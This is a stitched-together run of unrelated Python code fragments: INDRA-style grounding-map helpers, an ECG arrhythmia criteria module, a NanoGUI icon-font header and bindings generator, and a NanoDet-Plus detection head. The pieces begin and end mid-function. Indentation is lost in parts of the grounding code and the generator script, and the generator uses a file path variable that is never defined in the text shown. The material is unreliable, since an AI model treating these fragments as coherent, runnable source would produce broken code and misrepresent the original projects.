            # Check if TEXT is our only key, indicating no grounding
            if list(db_refs.keys()) == ['TEXT']:
                db_ref_list.append((None, None, count))
            # Add any other db_refs (not TEXT)
            for db, id in db_refs.items():
                if db == 'TEXT':
                    continue
                else:
                    db_ref_list.append((db, id, count))
            total += count
        # Sort the db_ref_list by the occurrences of each grounding
        entry.append(tuple(sorted(db_ref_list, key=lambda x: x[2],
                                  reverse=True)))
        # Now add the total frequency to the entry
        entry.append(total)
        # And add the entry to the overall list
        grouped_by_text.append(tuple(entry))
    # Sort the list by the total number of occurrences of each unique key
    grouped_by_text.sort(key=lambda x: x[2], reverse=True)
    return grouped_by_text
# List of all ungrounded entities by number of mentions
def ungrounded_texts(stmts):
    """Return (text, count) pairs of ungrounded agent texts, most frequent first.

    An agent counts as ungrounded when 'TEXT' is its only db_refs entry.

    Fixes two Python 3 incompatibilities in the original:
    - ``ag.db_refs.keys() == ['TEXT']`` compared a dict_keys view to a
      list, which is always False in Python 3; the keys are now converted
      to a list before comparing.
    - ``Counter.items()`` returns a view in Python 3, which has no
      ``.sort()`` method; ``sorted()`` is used instead.
    """
    ungrounded = [ag.db_refs['TEXT']
                  for s in stmts
                  for ag in s.agent_list()
                  if ag is not None and list(ag.db_refs.keys()) == ['TEXT']]
    return sorted(Counter(ungrounded).items(),
                  key=lambda x: x[1], reverse=True)
def get_agents_with_name(name, stmts):
    """Return every non-None agent across *stmts* whose name equals *name*."""
    found = []
    for stmt in stmts:
        for ag in stmt.agent_list():
            if ag is not None and ag.name == name:
                found.append(ag)
    return found
def save_base_map(filename, grouped_by_text):
    """Write grouped agent-text grounding statistics to a CSV file.

    Each output row is ``[agent text, database, ID, count, name]`` where
    name is the Uniprot mnemonic for 'UP' groundings and empty otherwise.
    *grouped_by_text* has the shape produced by
    agent_texts_with_grounding.
    """
    rows = []
    for group in grouped_by_text:
        text_string = group[0]
        for db, db_id, count in group[1]:
            mnemonic = uniprot_client.get_mnemonic(db_id) if db == 'UP' else ''
            rows.append([text_string, db, db_id, count, mnemonic])
    write_unicode_csv(filename, rows, delimiter=',', quotechar='"',
                      quoting=csv.QUOTE_MINIMAL, lineterminator='\r\n')
def protein_map_from_twg(twg):
"""Build map of entity texts to validated protein grounding.
Looks at the grounding of the entity texts extracted from the statements
and finds proteins where there is grounding to a human protein that maps to
an HGNC name that is an exact match to the entity text. Returns a dict that
can be used to update/expand the grounding map.
"""
protein_map = {}
unmatched = 0
matched = 0
logger.info('Building grounding map for human proteins')
for agent_text, grounding_list, total_count in twg:
# If 'UP' (Uniprot) not one of the grounding entries for this text,
# then we skip it.
if not 'UP' in [entry[0] for entry in grounding_list]:
continue
# Otherwise, collect all the Uniprot IDs | |
# -*- coding: utf-8 -*-
"""
knowledge about ECG arrhythmia
Standard 12Leads ECG
--------------------
Inferior leads: II, III, aVF
Lateral leads: I, aVL, V5-6
Septal leads: aVR, V1
Anterior leads: V2-4
-----------------------------------
Chest (precordial) leads: V1-6
Limb leads: I, II, III, aVR, aVL, aVF
ECG rhythm (https://litfl.com/ecg-rhythm-evaluation/)
-----------------------------------------------------
1. On a 12 lead ECG, ECG rhythm is usually a 10 second recording from Lead II
2. 7 steps to analyze:
2.1. rate (brady < 60 bpm; 60 bpm <= normal <= 100 bpm; tachy > 100 bpm)
2.2. pattern (temporal) of QRS complex (regular or irregular; if irregular, regularly irregular or irregularly irregular)
2.3. morphology (spatial) of QRS complex (narrow <= 120 ms; wide > 120 ms)
2.4. P waves (absent or present; morphology; PR interval)
2.5. relation of P waves and QRS complexes (atrial rate and ventricular rate, AV association or AV disassociation)
2.6. onset and termination (abrupt or gradual)
(2.7. response to vagal manoeuvres)
ECG waves
---------
https://ecgwaves.com/topic/ecg-normal-p-wave-qrs-complex-st-segment-t-wave-j-point/
References
----------
[1] https://litfl.com/
[2] https://ecgwaves.com/
[3] https://ecglibrary.com/ecghome.php
[4] https://courses.cs.washington.edu/courses/cse466/13au/pdfs/lectures/ECG%20filtering.pdf
NOTE that wikipedia is NOT listed in the References
"""
from io import StringIO
import pandas as pd
from easydict import EasyDict as ED
# Public API of this module: named lead-set constants plus one knowledge
# dict per ECG abnormality (each an EasyDict with "fullname", "url",
# "knowledge" keys). Names listed but not yet visible here (e.g. "PJC",
# "STD") are defined further down in the file.
__all__ = [
    # named lead sets
    "Standard12Leads",
    "ChestLeads", "PrecordialLeads", "LimbLeads",
    "InferiorLeads", "LateralLeads", "SeptalLeads", "AnteriorLeads",
    # ECG abnormalities (arrhythmias)
    "AF", "AFL", # atrial
    "IAVB", "LBBB", "CLBBB", "RBBB", "CRBBB", "IRBBB", "LAnFB", "NSIVCB", "BBB", # conduction block
    "PAC", "PJC", "PVC", "SPB", # premature: qrs, morphology
    "LPR", "LQT", "QAb", "TAb", "TInv", # wave morphology
    "LAD", "RAD", # axis
    "Brady", "LQRSV", "PRWP", # qrs (RR interval, amplitude)
    "SA", "SB", "NSR", "STach", # sinus
    "PR", # pacer
    "STD", "STE", # ST segments
]
# Named subsets of the standard 12-lead ECG (see module docstring).
LimbLeads = ["I", "II", "III", "aVR", "aVL", "aVF"]
# Chest leads V1-V6; "precordial" is a synonym, kept as an alias of the
# same list object.
ChestLeads = [f"V{i}" for i in range(1, 7)]
PrecordialLeads = ChestLeads
# The full 12-lead set: six limb leads followed by the six chest leads.
Standard12Leads = LimbLeads + ChestLeads
# Anatomical groupings used when localizing abnormalities.
InferiorLeads = ["II", "III", "aVF"]
LateralLeads = ["I", "aVL", "V5", "V6"]
SeptalLeads = ["aVR", "V1"]
AnteriorLeads = ["V2", "V3", "V4"]
# Base URL for SNOMED CT code lookups (append the numeric concept code).
_snomedbrowser_url = "https://snomedbrowser.com/Codes/Details/"
# Each abnormality below is an EasyDict with keys:
#   "fullname"  -- human-readable diagnosis name
#   "url"       -- reference pages the criteria were taken from
#   "knowledge" -- diagnostic criteria, one human-readable cue per string
# The trailing comment on each assignment marks which signal features the
# diagnosis relies on (RR intervals, waveform morphology, voltage, ...).
AF = ED({ # rr, morphology
    "fullname": "atrial fibrillation",
    "url": [
        "https://litfl.com/atrial-fibrillation-ecg-library/",
        "https://en.wikipedia.org/wiki/Atrial_fibrillation#Screening",
    ],
    "knowledge": [
        "irregularly irregular rhythm",
        "no P waves",
        "absence of an isoelectric baseline",
        "variable ventricular rate",
        "QRS complexes usually < 120 ms unless pre-existing bundle branch block, accessory pathway, or rate related aberrant conduction",
        "fibrillatory waves (f-wave) may be present and can be either fine (amplitude < 0.5mm) or coarse (amplitude > 0.5mm)",
        "fibrillatory waves (f-wave) may mimic P waves leading to misdiagnosis",
    ],
})
AFL = ED({ # rr, morphology
    "fullname": "atrial flutter",
    "url": [
        "https://litfl.com/atrial-flutter-ecg-library/",
        "https://en.wikipedia.org/wiki/Atrial_flutter",
    ],
    "knowledge": [
        "a type of supraventricular tachycardia caused by a re-entry circuit within the right atrium",
        "fairly predictable atrial rate (NOT equal to ventricular rate for AFL) of around 300 bpm (range 200-400)",
        "fixed AV blocks, with ventricular rate a fraction (1/2,1/3,etc.) of atrial rate",
        "narrow complex tachycardia (ref. supraventricular & ventricular rate)",
        "flutter waves ('saw-tooth' pattern) best seen in leads II, III, aVF (may be more easily spotted by turning the ECG upside down), may resemble P waves in V1",
        "loss of the isoelectric baseline", # important
    ],
})
Brady = ED({ # rr
    "fullname": "bradycardia",
    "url": [
        "https://litfl.com/bradycardia-ddx/",
        "https://en.wikipedia.org/wiki/Bradycardia"
    ],
    "knowledge": [
        "heart rate (ventricular rate) < 60/min in an adult",
    ],
})
# NOTE(review): "knowledge" intentionally empty here -- generic BBB is
# presumably covered by the specific LBBB/RBBB entries; confirm before
# relying on this entry.
BBB = ED({ # morphology
    "fullname": "bundle branch block",
    "url": [
    ],
    "knowledge": [],
})
# First-degree AV block: diagnosed purely from PR-interval morphology.
IAVB = ED({ # morphology
    "fullname": "1st degree av block",
    "url": [
        "https://litfl.com/first-degree-heart-block-ecg-library/",
        "https://en.wikipedia.org/wiki/Atrioventricular_block#First-degree_Atrioventricular_Block"
    ],
    "knowledge": [
        "PR interval > 200ms",
        # fixed: the opening quote around 'Marked' was missing ("Marked’ ...")
        "‘Marked’ first degree block if PR interval > 300ms",
        "P waves might be buried in the preceding T wave",
        "there are no dropped, or skipped, beats",
    ],
})
LBBB = ED({ # morphology
    "fullname": "left bundle branch block",
    "url": [
        "https://litfl.com/left-bundle-branch-block-lbbb-ecg-library/",
        "https://en.wikipedia.org/wiki/Left_bundle_branch_block",
    ],
    "knowledge": [
        "heart rhythm must be supraventricular",
        "QRS duration of > 120 ms",
        "lead V1: Dominant S wave, with QS or rS complex",
        "lateral leads: M-shaped, or notched, or broad monophasic R wave or RS complex; absence of Q waves (small Q waves are still allowed in aVL)",
        "chest (precordial) leads: poor R wave progression",
        "left precordial leads (V5-6): prolonged R wave peak time > 60ms",
        "ST segments and T waves always go in the opposite direction to the main vector of the QRS complex",
    ],
})
# NOTE(review): "knowledge"/"url" intentionally empty -- the complete form
# is presumably diagnosed via the LBBB criteria above; confirm before
# relying on this entry.
CLBBB = ED({ # morphology
    "fullname": "complete left bundle branch block",
    "url": [
    ],
    "knowledge": [
    ],
})
RBBB = ED({ # morphology
    "fullname": "right bundle branch block",
    "url": [
        "https://litfl.com/right-bundle-branch-block-rbbb-ecg-library/",
        "https://en.wikipedia.org/wiki/Right_bundle_branch_block",
    ],
    "knowledge": [
        "broad QRS > 100 ms (incomplete block) or > 120 ms (complete block)",
        "leads V1-3: RSR’ pattern (‘M-shaped’ QRS complex); sometimes a broad monophasic R wave or a qR complex in V1",
        "lateral leads: wide, slurred S wave",
    ],
})
# Same references as RBBB; the complete form pins QRS > 120 ms.
CRBBB = ED({ # morphology
    "fullname": "complete right bundle branch block",
    "url": [
        "https://litfl.com/right-bundle-branch-block-rbbb-ecg-library/",
        "https://en.wikipedia.org/wiki/Right_bundle_branch_block",
    ],
    "knowledge": [
        "broad QRS > 120 ms",
        "leads V1-3: RSR’ pattern (‘M-shaped’ QRS complex); sometimes a broad monophasic R wave or a qR complex in V1",
        "lateral leads: wide, slurred S wave",
    ],
})
IRBBB = ED({ # morphology
    "fullname": "incomplete right bundle branch block",
    "url": [
        "https://litfl.com/right-bundle-branch-block-rbbb-ecg-library/",
        "https://en.wikipedia.org/wiki/Right_bundle_branch_block#Diagnosis",
    ],
    "knowledge": [
        "defined as an RSR’ pattern in V1-3 with QRS duration < 120ms (and > 100ms?)",
        "normal variant, commonly seen in children (of no clinical significance)",
    ],
})
LAnFB = ED({ # morphology
    "fullname": "left anterior fascicular block",
    "url": [
        "https://litfl.com/left-anterior-fascicular-block-lafb-ecg-library/",
        "https://en.wikipedia.org/wiki/Left_anterior_fascicular_block",
    ],
    "knowledge": [
        "inferior leads (II, III, aVF): small R waves, large negative voltages (deep S waves), i.e. 'rS complexes'",
        "left-sided leads (I, aVL): small Q waves, large positive voltages (tall R waves), i.e. 'qR complexes'",
        "slight widening of the QRS",
        "increased R wave peak time in aVL",
        "LAD of degree (-45°, -90°)"
    ],
})
LQRSV = ED({ # voltage
    "fullname": "low qrs voltages",
    "url": [
        "https://litfl.com/low-qrs-voltage-ecg-library/",
        "https://www.healio.com/cardiology/learn-the-heart/ecg-review/ecg-topic-reviews-and-criteria/low-voltage-review",
    ],
    "knowledge": [
        "peak-to-peak (VERY IMPORTANT) amplitudes of all the QRS complexes in the limb leads are < 5mm (0.5mV); or amplitudes of all the QRS complexes in the precordial leads are < 10mm (1mV)",
    ],
})
PRWP = ED({ # voltage
    "fullname": "poor R wave progression",
    "url": [
        "https://litfl.com/poor-r-wave-progression-prwp-ecg-library/",
        "https://www.healio.com/cardiology/learn-the-heart/ecg-review/ecg-topic-reviews-and-criteria/poor-r-wave-progression",
        "https://emergencymedicinecases.com/ecg-cases-poor-r-wave-progression-late-mnemonic/",
        "https://www.wikidoc.org/index.php/Poor_R_Wave_Progression",
    ],
    # The definition of poor R wave progression (PRWP) varies in the
    # literature; the cues below deliberately keep several variants.
    "knowledge": [
        "absence of the normal increase in size of the R wave in the precordial leads when advancing from lead V1 to V6",
        "in lead V1, the R wave should be small. The R wave becomes larger throughout the precordial leads, to the point where the R wave is larger than the S wave in lead V4. The S wave then becomes quite small in lead V6.",
        "failure of the R wave to progress in amplitude (R<3mm in V3), reversal of the progression (eg R in V2>V3), or delayed transition beyond V4",
        "R wave is less than 2–4 mm in leads V3 or V4 and/or there is presence of a reversed R wave progression, which is defined as R in V4 < R in V3 or R in V3 < R in V2 or R in V2 < R in V1, or any combination of these",
    ],
})
NSIVCB = ED({ # morphology
    "fullname": "nonspecific intraventricular conduction disorder",
    "url": [
        "https://ecgwaves.com/topic/nonspecific-intraventricular-conduction-delay-defect/",
        "https://www.dynamed.com/condition/intraventricular-conduction-disorders-including-left-and-right-bundle-branch-block-lbbb-and-rbbb",
        "https://www.sciencedirect.com/science/article/pii/S0735109708041351",
        "https://www.heartrhythmjournal.com/article/S1547-5271(15)00073-9/abstract",
    ],
    "knowledge": [
        # fixed typo in knowledge text: "widended" -> "widened"
        "widened (> 110ms) QRS complex, with not meeting the criteria (morphology different from) for LBBB and RBBB",
    ],
})
# NOTE: "PR" here denotes paced rhythm (pacemaker), not the PR interval.
PR = ED({ # morphology
    "fullname": "pacing rhythm",
    "url": [
        "https://litfl.com/pacemaker-rhythms-normal-patterns/",
        "https://www.youtube.com/watch?v=YkB4oX_COi8",
    ],
    "knowledge": [
        "morphology is dependent on the pacing mode (AAI, VVI, DDD, Magnet) used",
        "there are pacing spikes: vertical spikes of short duration, usually 2 ms (in doubt, viewing signals of the CINC2020 dataset, probably 10-20ms(at most half a small grid)?)", # important
        "AAI (atrial pacing): pacing spike precedes the p wave",
        "VVI (ventricle pacing): pacing spike precedes the QRS complex; morphology similar to LBBB or RBBB (depending on lead placement)",
    ],
})
PAC = ED({ # morphology, very complicated
"fullname": "premature atrial contraction",
"url": [
"https://litfl.com/premature-atrial-complex-pac/",
"https://en.wikipedia.org/wiki/Premature_atrial_contraction",
],
"knowledge": [
"an abnormal (non-sinus) P wave is followed by a QRS complex",
"P wave typically has a different morphology and axis to the sinus P waves",
"abnormal P wave may be hidden in the preceding | |
#!/usr/bin/env python3
# Generates the NanoGUI C++ icon-constant header, Python bindings and
# example programs for an icon font, from the CSS emitted by fontcustom.
import os
import codecs
from io import BytesIO  # NOTE(review): unused in the visible part of the script -- confirm before removing
import re
import sys
import textwrap
# vvv These are updated by ./manufacture.py
EXPECTED_NUM_ICONS = 929  # sanity check: number of icons the CSS must define
FONT_NAME = "fontawesome"
FONT_LICENSE = "CC-BY-SA 4.0: https://github.com/FortAwesome/Font-Awesome/blob/master/LICENSE.txt"
# ^^^ These are updated by ./manufacture.py
if __name__ == "__main__":
    # Make sure we're in the same directory to avoid overwriting things:
    # every path below is relative to the script's own directory.
    file_loc = os.path.dirname(os.path.abspath(__file__))
    curr_dir = os.path.abspath(os.getcwd())
    if file_loc != curr_dir:
        sys.stderr.write(
            "Please execute this script in directory [{0}]\n".format(file_loc)
        )
        sys.exit(1)
    # Make sure the CSS file exists / has been generated
    # (expected at compiled_fonts/<font>/<font>.css, produced by `rake`).
    css_file = os.path.abspath(
        os.path.join(
            file_loc,
            "compiled_fonts",
            FONT_NAME,
            "{name}.css".format(name=FONT_NAME)
        )
    )
    if not os.path.exists(css_file):
        sys.stderr.write(
            "[{0}] does not exist. Make sure you already generated it (with `rake`).\n".format(
                css_file
            )
        )
        sys.exit(1)
    # Generate header file
    cdefs = []  # (icon_name, "#define ..." text, "0x..." hex code) triples
    num_matches = 0  # icons found in the CSS; checked against EXPECTED_NUM_ICONS
    longest = 0  # longest "#define ..." text, used to column-align the codes
    try:
        # fontcustom generates something like
        # .fontname-icon-location:before { content: "\e724"; }
        icon_re = re.compile(r'\.{name}-icon-(.+):before {{ content: "\\(.+)"; }}'.format(name=FONT_NAME))
        with codecs.open(css_file, "r", "utf-8") as css:
            for line in css:
                match = icon_re.match(line)
                if match:
                    num_matches += 1
                    icon_name, icon_code = match.groups()
                    icon_def = "#define {font}_ICON_{icon}".format(
                        font=FONT_NAME.upper(),
                        icon=icon_name.replace("-", "_").upper()
                    )
                    # {code:0>8} format spec says using code variable, align it to
                    # the right and make it a fixed width of 8 characters, padding
                    # with a 0. AKA zero-fill on the left until 8 char long
                    icon_code = "0x{code:0>8}".format(code=icon_code.upper())
                    cdefs.append((icon_name, icon_def, icon_code))
                    longest = max(longest, len(icon_def))
    except Exception as e:
        sys.stderr.write(
            "Critical: error processing file [{0}]: {1}\n".format(css_file, e)
        )
        sys.exit(1)
    # Refuse to continue on a count mismatch: the font and this script are
    # out of sync (EXPECTED_NUM_ICONS is maintained by ./manufacture.py).
    if num_matches == EXPECTED_NUM_ICONS:
        print("Found exactly [{0}] icons, as expected.".format(num_matches))
    else:
        sys.stderr.write(
            "Found [{0}] icons, expected [{1}]\n".format(num_matches,
                                                         EXPECTED_NUM_ICONS)
        )
        sys.exit(1)
    # Create the ./nanogui output tree and the per-font subdirectory;
    # abort on any filesystem failure.
    if not os.path.isdir("nanogui"):
        try:
            os.mkdir("nanogui")
        except Exception as e:
            sys.stderr.write(
                "Critical: could not make directory ./nanogui: {0}\n".format(e)
            )
            sys.exit(1)
    containment = "nanogui/{name}".format(name=FONT_NAME)
    if not os.path.isdir(containment):
        try:
            os.mkdir(containment)
        except Exception as e:
            sys.stderr.write(
                "Critical: could not make directory {0}: {1}\n".format(
                    containment, e
                )
            )
            sys.exit(1)
try:
font_header_file = open(font_header_file_path, "w")
font_header_file.write(textwrap.dedent(r'''
/*
NanoGUI was developed by <NAME> <<EMAIL>>.
The widget drawing code is based on the NanoVG demo application
by <NAME>.
All rights reserved. Use of this source code is governed by a
BSD-style license that can be found in the LICENSE.txt file.
This file represents the constants that can be used provided by the
{name} font.
License: {license}
*/
/* Developer note: need to make a change to this file?
* Please raise an Issue on GitHub describing what needs to change. This file
* was generated, so the scripts that generated it need to update as well.
*/
#pragma once
'''.format(
name=FONT_NAME,
license=FONT_LICENSE
).replace("\n", "", 1))) # remove empty line at top
font_python_bindings_path = "{containment}/constants_{name}.cpp".format(
containment=containment, name=FONT_NAME
)
font_python_bindings = open(font_python_bindings_path, "w")
font_python_bindings.write(textwrap.dedent('''
#ifdef NANOGUI_PYTHON
#include "python.h"
#include <nanogui/{name}.h>
/* Python bindings for the {name} font.
*
* License: {license}
*/
/* Developer note: need to make a change to this file?
* Please raise an Issue on GitHub describing what needs to change. This file
* was generated, so the scripts that generated it need to update as well.
*/
void register_constants_{name}(py::module &m) {{
/* bindings for the {name} font */
{{
#define C(name) g.attr("ICON_" #name) = py::int_({NAME}_ICON_##name);
py::module g = m.def_submodule("{name}");
'''.format(
name=FONT_NAME,
NAME=FONT_NAME.upper(),
license=FONT_LICENSE
)))
# Generate the full header file / python bindings
for icon_name, icon_def, icon_code in cdefs:
# icon_def is `#define {FONT_NAME.upper()}_ICON_X`
# Generate the header file #define directive
font_header_file.write("{definition:<{longest}} {code}\n".format(
definition=icon_def,
longest=longest,
code=icon_code
))
# Generate the python binding
cpp_def = icon_def.split(" ")[1]
py_def = cpp_def.split("{NAME}_ICON_".format(NAME=FONT_NAME.upper()))[1]
pybind = "C({0});".format(py_def)
py_name = "ICON_{0}".format(py_def)
font_python_bindings.write(" {pybind}\n".format(pybind=pybind))
# close the pybind
font_python_bindings.write(textwrap.dedent('''
#undef C
}
}
#endif
'''))
font_header_file.close()
font_python_bindings.close()
# generate the example icon programs
cpp_example_path = "{containment}/example_{name}.cpp".format(
containment=containment, name=FONT_NAME
)
cpp_example = open(cpp_example_path, "w")
# write the header of the cpp example
cpp_example.write(textwrap.dedent(r'''
/* Developer note: need to make a change to this file?
* Please raise an Issue on GitHub describing what needs to change. This file
* was generated, so the scripts that generated it need to update as well.
*/
#include <nanogui/nanogui.h>
#include <nanogui/resources.h>
#include <nanogui/{name}.h>
using namespace nanogui;
// Custom theme for loading the {name} font
class {Name}Theme : public nanogui::Theme {{
public:
// This override informs NanoGUI to use this as the icon font.
virtual std::string defaultIconFont() const override {{ return "{name}"; }}
{Name}Theme(NVGcontext *ctx) : nanogui::Theme(ctx) {{
// load the {name} font into memory
m{Name}Font = nanogui::createFontMem(ctx, "{name}", "{name}.ttf");
if (m{Name}Font == -1)
throw std::runtime_error("Could not load the {name} font!");
// TODO: you need to override the following default icon choices in your
// own application! See documentation for nanogui::Theme.
// mCheckBoxIcon = ENTYPO_ICON_CHECK;
// mCheckBoxIconExtraScale = defaultCheckBoxIconExtraScale();
// mMessageInformationIcon = ENTYPO_ICON_INFO_WITH_CIRCLE;
// mMessageQuestionIcon = ENTYPO_ICON_HELP_WITH_CIRCLE;
// mMessageWarningIcon = ENTYPO_ICON_WARNING;
// mMessageAltButtonIcon = ENTYPO_ICON_CIRCLE_WITH_CROSS;
// mMessagePrimaryButtonIcon = ENTYPO_ICON_CHECK;
// mPopupChevronRightIcon = ENTYPO_ICON_CHEVRON_RIGHT;
// mPopupChevronLeftIcon = ENTYPO_ICON_CHEVRON_LEFT;
// mPopupIconExtraScale = defaultPopupIconExtraScale();
// mTabHeaderLeftIcon = ENTYPO_ICON_ARROW_BOLD_LEFT;
// mTabHeaderRightIcon = ENTYPO_ICON_ARROW_BOLD_RIGHT;
// mTextBoxUpIcon = ENTYPO_ICON_CHEVRON_UP;
// mTextBoxDownIcon = ENTYPO_ICON_CHEVRON_DOWN;
// mTextBoxIconExtraScale = defaultTextBoxIconExtraScale();
}}
virtual ~{Name}Theme() {{ /* nothing to free */ }}
protected:
int m{Name}Font = -1;
}};
class {Name}Screen : public nanogui::Screen {{
public:
{Name}Screen(const Vector2i &size, const std::string &title, bool resizable)
: nanogui::Screen(size, title, resizable) {{
m{Name}Theme = new {Name}Theme(this->mNVGContext);
this->setTheme(m{Name}Theme);
}}
virtual ~{Name}Screen() {{ /* nothing to free */ }}
// allow <ESCAPE> to exit
virtual bool keyboardEvent(int key, int scancode, int action, int modifiers) override {{
if (key == GLFW_KEY_ESCAPE && modifiers == 0) {{
setVisible(false);
return true;
}}
return Screen::keyboardEvent(key, scancode, action, modifiers);
}}
protected:
nanogui::ref<{Name}Theme> m{Name}Theme;
}};
// Convenience macro for creating an IconBox. Make sure you put a semicolon after the call to this macro!
#define ADD_ICON(parent, icon, boxWidth) \
new IconBox(parent, #icon, icon, boxWidth)
class IconBox : public Widget {{
public:
IconBox(Widget *parent, const std::string &name, int icon, int width)
: Widget(parent) {{
this->setLayout(new BoxLayout(Orientation::Horizontal));
auto *b = new Button(this, "", icon);
b->setFixedWidth(40);
auto *text = new TextBox(this, name);
text->setDefaultValue(name);
text->setEditable(true);
/* Return false essentially makes it not possible to actually edit this text
* box, but keeping it editable=true allows selection for copy-paste. If the
* text box is not editable, then the user cannot highlight it.
*/
text->setCallback([](const std::string &) {{ return false; }});
text->setFont("mono-bold");
text->setFixedWidth(width - 40);
}}
}};
int main(int /* argc */, char ** /* argv */) {{
nanogui::init();
/* scoped variables */ {{
static constexpr int width = 1000;
static constexpr int half_width = width / 2;
static constexpr int height = 800;
// create a fixed size screen with one window
{Name}Screen *screen = new {Name}Screen({{width, height}}, "NanoGUI {Name} Icons", false);
// create the custom theme now so that all children will inherit it
Window *window = new Window(screen, "");
window->setPosition({{0, 0}});
window->setFixedSize({{width, height}});
// attach a vertical scroll panel
auto vscroll = new VScrollPanel(window);
vscroll->setFixedSize({{width, height}});
// vscroll should only have *ONE* child. this is what `wrapper` is for
auto wrapper = new Widget(vscroll);
wrapper->setFixedSize({{width, height}});
wrapper->setLayout(new GridLayout());// defaults: 2 columns
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
'''.format(
name=FONT_NAME,
Name=FONT_NAME.capitalize()
)).lstrip())
for icon_name, icon_def, icon_code in cdefs:
# icon_def is `#define FONTNAME_ICON_X`
cpp_def = icon_def.split(" ")[1]
cpp_example.write(" ADD_ICON(wrapper, {cpp_def}, half_width);\n".format(cpp_def=cpp_def))
# close out the cpp example
cpp_example.write(textwrap.dedent('''
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
screen->performLayout();
screen->setVisible(true);
nanogui::mainloop();
}
nanogui::shutdown();
return 0;
}
''').replace("\n", "", 1))
cpp_example.close()
# <3 python
py_example_path = "{containment}/example_{name}.py".format(
containment=containment, name=FONT_NAME
)
with open(py_example_path, "w") as py_example:
py_example.write(textwrap.dedent('''
# Developer note: need to make a change to this file?
# Please raise an Issue on GitHub describing what needs to change. This file
# was generated, so the scripts that generated it need to update as well.
import gc
import nanogui
from nanogui import Screen, Window, Widget, GridLayout, VScrollPanel, Button, TextBox, BoxLayout, Orientation, Theme
from nanogui import {name}
class {Name}Theme(nanogui.Theme):
# This override informs NanoGUI to use this as the icon font.
def defaultIconFont(self):
return "{name}"
def __init__(self, ctx):
super({Name}Theme, self).__init__(ctx)
self.m{Name}Font = nanogui.createFontMem(ctx, "{name}", "{name}.ttf")
if self.m{Name}Font == -1:
raise RuntimeError("Could | |
# Source repository: automaton123456/nanodet
import math
import cv2
import numpy as np
import torch
import torch.nn as nn
from nanodet.util import bbox2distance, distance2bbox, multi_apply, overlay_bbox_cv
from ...data.transform.warp import warp_boxes
from ..loss.gfocal_loss import DistributionFocalLoss, QualityFocalLoss
from ..loss.iou_loss import GIoULoss
from ..module.conv import ConvModule, DepthwiseConvModule
from ..module.init_weights import normal_init
from ..module.nms import multiclass_nms
from .assigner.dsl_assigner import DynamicSoftLabelAssigner
from .gfl_head import Integral, reduce_mean
class NanoDetPlusHead(nn.Module):
"""Detection head used in NanoDet-Plus.
Args:
num_classes (int): Number of categories excluding the background
category.
loss (dict): Loss config.
input_channel (int): Number of channels of the input feature.
feat_channels (int): Number of channels of the feature.
Default: 96.
stacked_convs (int): Number of conv layers in the stacked convs.
Default: 2.
kernel_size (int): Size of the convolving kernel. Default: 5.
strides (list[int]): Strides of input multi-level feature maps.
Default: [8, 16, 32].
conv_type (str): Type of the convolution.
Default: "DWConv".
norm_cfg (dict): Dictionary to construct and config norm layer.
Default: dict(type='BN').
reg_max (int): The maximal value of the discrete set. Default: 7.
activation (str): Type of activation function. Default: "LeakyReLU".
assigner_cfg (dict): Config dict of the assigner. Default: dict(topk=13).
"""
def __init__(
self,
num_classes,
loss,
input_channel,
feat_channels=96,
stacked_convs=2,
kernel_size=5,
strides=[8, 16, 32],
conv_type="DWConv",
norm_cfg=dict(type="BN"),
reg_max=7,
activation="LeakyReLU",
assigner_cfg=dict(topk=13),
**kwargs
):
super(NanoDetPlusHead, self).__init__()
self.num_classes = num_classes
self.in_channels = input_channel
self.feat_channels = feat_channels
self.stacked_convs = stacked_convs
self.kernel_size = kernel_size
self.strides = strides
self.reg_max = reg_max
self.activation = activation
self.ConvModule = ConvModule if conv_type == "Conv" else DepthwiseConvModule
self.loss_cfg = loss
self.norm_cfg = norm_cfg
self.assigner = DynamicSoftLabelAssigner(**assigner_cfg)
self.distribution_project = Integral(self.reg_max)
self.loss_qfl = QualityFocalLoss(
beta=self.loss_cfg.loss_qfl.beta,
loss_weight=self.loss_cfg.loss_qfl.loss_weight,
)
self.loss_dfl = DistributionFocalLoss(
loss_weight=self.loss_cfg.loss_dfl.loss_weight
)
self.loss_bbox = GIoULoss(loss_weight=self.loss_cfg.loss_bbox.loss_weight)
self._init_layers()
self.init_weights()
def _init_layers(self):
self.cls_convs = nn.ModuleList()
for _ in self.strides:
cls_convs = self._buid_not_shared_head()
self.cls_convs.append(cls_convs)
self.gfl_cls = nn.ModuleList(
[
nn.Conv2d(
self.feat_channels,
self.num_classes + 4 * (self.reg_max + 1),
1,
padding=0,
)
for _ in self.strides
]
)
def _buid_not_shared_head(self):
cls_convs = nn.ModuleList()
for i in range(self.stacked_convs):
chn = self.in_channels if i == 0 else self.feat_channels
cls_convs.append(
self.ConvModule(
chn,
self.feat_channels,
self.kernel_size,
stride=1,
padding=self.kernel_size // 2,
norm_cfg=self.norm_cfg,
bias=self.norm_cfg is None,
activation=self.activation,
)
)
return cls_convs
def init_weights(self):
for m in self.cls_convs.modules():
if isinstance(m, nn.Conv2d):
normal_init(m, std=0.01)
# init cls head with confidence = 0.01
bias_cls = -4.595
for i in range(len(self.strides)):
normal_init(self.gfl_cls[i], std=0.01, bias=bias_cls)
print("Finish initialize NanoDet-Plus Head.")
def forward(self, feats):
if torch.onnx.is_in_onnx_export():
return self._forward_onnx(feats)
outputs = []
for feat, cls_convs, gfl_cls in zip(
feats,
self.cls_convs,
self.gfl_cls,
):
for conv in cls_convs:
feat = conv(feat)
output = gfl_cls(feat)
outputs.append(output.flatten(start_dim=2))
outputs = torch.cat(outputs, dim=2).permute(0, 2, 1)
return outputs
def loss(self, preds, gt_meta, aux_preds=None):
"""Compute losses.
Args:
preds (Tensor): Prediction output.
gt_meta (dict): Ground truth information.
aux_preds (tuple[Tensor], optional): Auxiliary head prediction output.
Returns:
loss (Tensor): Loss tensor.
loss_states (dict): State dict of each loss.
"""
gt_bboxes = gt_meta["gt_bboxes"]
gt_labels = gt_meta["gt_labels"]
device = preds.device
batch_size = preds.shape[0]
input_height, input_width = gt_meta["img"].shape[2:]
featmap_sizes = [
(math.ceil(input_height / stride), math.ceil(input_width) / stride)
for stride in self.strides
]
# get grid cells of one image
mlvl_center_priors = [
self.get_single_level_center_priors(
batch_size,
featmap_sizes[i],
stride,
dtype=torch.float32,
device=device,
)
for i, stride in enumerate(self.strides)
]
center_priors = torch.cat(mlvl_center_priors, dim=1)
cls_preds, reg_preds = preds.split(
[self.num_classes, 4 * (self.reg_max + 1)], dim=-1
)
